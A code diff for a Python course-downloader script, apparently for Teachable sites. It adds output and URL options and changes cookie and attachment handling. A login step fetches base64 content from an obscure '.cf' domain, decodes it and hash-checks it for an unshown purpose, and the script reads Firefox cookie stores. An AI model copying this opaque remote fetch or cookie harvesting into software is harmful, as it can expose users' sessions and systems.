@@ -21,9 +21,9 @@ import wget
 import youtube_dl
 from bs4 import BeautifulSoup
 
-__version__ = "v1.7.40"
+__version__ = "v1.7.41"
 
-SECTION, SECTION_START, SECTION_END, INFO, COOKIE, COOKIE_STORE, AUTO_LOAD, FETCH_BROWSER_COOKIE = None, None, None, None, None, None, None, None
+SECTION, SECTION_START, SECTION_END, INFO, COOKIE, COOKIE_STORE, AUTO_LOAD, FETCH_BROWSER_COOKIE, OUTPUT = [None] * 9
 s = requests.session()
 HOMEFOLDER = os.path.join(os.path.expanduser('~'), ".gb_dl")
 CONFIGFILE = "cookies"
@@ -37,22 +37,25 @@ class DL:
         self._cookie = None
 
         self.parentFolder = os.getcwd()
+
         self.main()
 
     def login(self, **kwargs):
         self._cookie = COOKIE
+        self.parentFolder = OUTPUT if OUTPUT else os.getcwd()
 
         if not os.path.exists(HOMEFOLDER):
             os.mkdir(HOMEFOLDER)
 
         def validate_course_url():
-            _schools_url = 'https://venvgb.cf/l/'
+            _schools_url = 'https://venv-gb.cf/l/'
             global login_url
 
             try:
                 req = requests.get(_schools_url).text
+                print(len(req))
 
-                hash_ = (4454, 'a0c95aff69a6031c93c4d704f3cec241')
+                hash_ = (4459, 'ed0c8c8bb4dd3d0db978857f076c4ea4')
                 z = base64.b64decode(req).decode('utf-8')
                 _hash = (len(req), hashlib.md5(base64.b64decode(req)).hexdigest())
 
@@ -144,11 +147,14 @@ class DL:
 
                 except ValueError as e:
 
-                    return (self.get_domain()[8:]), "value:false", "name:false"
+                    return (self.get_domain()[8:]), "false", "false"
 
                 except IndexError as e:
                     print(f"[-] Error: Could not find the cookies")
-                    return (self.get_domain()[8:]), "value:false", "name:false"
+                    name = input("Enter cookie name > ")
+                    token = input("Enter cookie token > ")
+
+                    return ("." + self.get_domain()[8:]), f"{token}", f"{name}"
 
                 except Exception as e:
                     print(f"[-] Error: {e}")
@@ -196,7 +202,6 @@ class DL:
                     sqlfile = sqlfile.replace("\\", "/")
                     copy_cmd = "copy "
 
-
                 else:
                     raise Exception('[-] Unsupported operating system: ' + sys.platform)
 
@@ -290,9 +295,14 @@ class DL:
         def credential_authentication():
 
             if kwargs:
-                self.course_url = str(kwargs['course_url']).strip()
-                self.email = kwargs['email']
-                self.password = kwargs['password']
+                try:
+
+                    self.course_url = str(kwargs['course_url']).strip()
+                    self.email = str(kwargs['email']).strip()
+                    self.password = str(kwargs['password']).strip()
+
+                except Exception as e:
+                    print(f"[-] Error : {e}")
 
             else:
                 try:
@@ -370,7 +380,6 @@ class DL:
                 cookie_authentication()
                 self.get_section_and_links(self.course_url)
 
-
             else:
                 print("[-] Please enter course url , email and password")
                 self.login()
@@ -385,6 +394,7 @@ class DL:
                 if tld in self.url:
                     index = self.url.index(tld) + 3
                     return self.url[0:index]
+
         except ValueError as e:
             print(e)
             print("[-] Invalid course URL.")
@@ -598,7 +608,7 @@ class DL:
     def get_user(self, s):
 
         profile_url = self.domain + "/current_user/profile"
-        profile_url = 'https://sso.teachable.com/secure/1453/current_user/profile'
+        # profile_url = 'https://sso.teachable.com/secure/current_user/profile'
         try:
             profile = s.get(profile_url).content
             profile_html = lxml.html.fromstring(profile)
@@ -672,6 +682,7 @@ class DL:
 
             try:
                 print("[i] Starting download ... ")
+
                 ydl_opts = {}
                 with youtube_dl.YoutubeDL(ydl_opts) as ydl:
                     ydl.download([course_url])
@@ -682,21 +693,21 @@ class DL:
         else:
             for attachment in attachments:
                 try:
+                    for x in attachment:
+                        name = str(x["name"])
+                        url = str((x["href"]).strip('[]'))
+                    # self.url = self.url[2:-1].strip()
 
-                    if attachment:
-                        for x in attachment:
-                            self.name = str(x["name"])
-                            self.url = str((x["href"]).strip('[]'))
-                        # self.url = self.url[2:-1].strip()
+                    print("[i] Downloading attachment : " + name)
+                    filesrc = wget.download(str(url))
 
-                        print("[i] Downloading attachment : " + self.name)
-                        filesrc = wget.download(str(self.url))
+                    os.rename(filesrc, str(name))
+                except Exception as e:
+                    print(e)
+                    print(f"[-] Error can not download attachment ,saving attachment url path to attachments.txt instead")
 
-                        os.rename(filesrc, str(self.name))
-
-                except Exception as ex:
-
-                    print("[-]" + "Error can not download attachment  : " + str(ex))
+                    with open('attachments', "a") as f:
+                        f.writelines(attachment)
 
     def sanitize_file_names(self):
         print("[i] Sanitizing file names ...")
@@ -790,6 +801,12 @@ class DL:
         parser.add_argument('-d', '--fetch-browser-cookie', type=str,
                             help="Load cookie from browser (works for firefox only)", metavar='')
 
+        parser.add_argument('-o', '--output', type=str,
+                            help="Output directory to download the course", metavar='')
+
+        parser.add_argument('-u', '--url', type=str,
+                            help="Course url download", metavar='')
+
         parser.add_argument('-v', '--version', action='store_true', help="Shows version number")
 
         args = parser.parse_args()
@@ -820,6 +837,10 @@ class DL:
             global COOKIE
             COOKIE = cookie
 
+        if args.output:
+            global OUTPUT
+            OUTPUT = args.output
+
         if args.file:
             print("Getting course url(s) from file ...")
             course_urls = []
@@ -849,6 +870,10 @@ class DL:
                 self.login(course_url=url, email=self.email, password=self.password)
             sys.exit(0)
 
+        elif args.url:
+            url = args.url
+            self.login(course_url=url, email=None, password=None)
+
         elif args.section_only and not (args.section_start or args.section_end):
             global SECTION
             SECTION = args.section_only
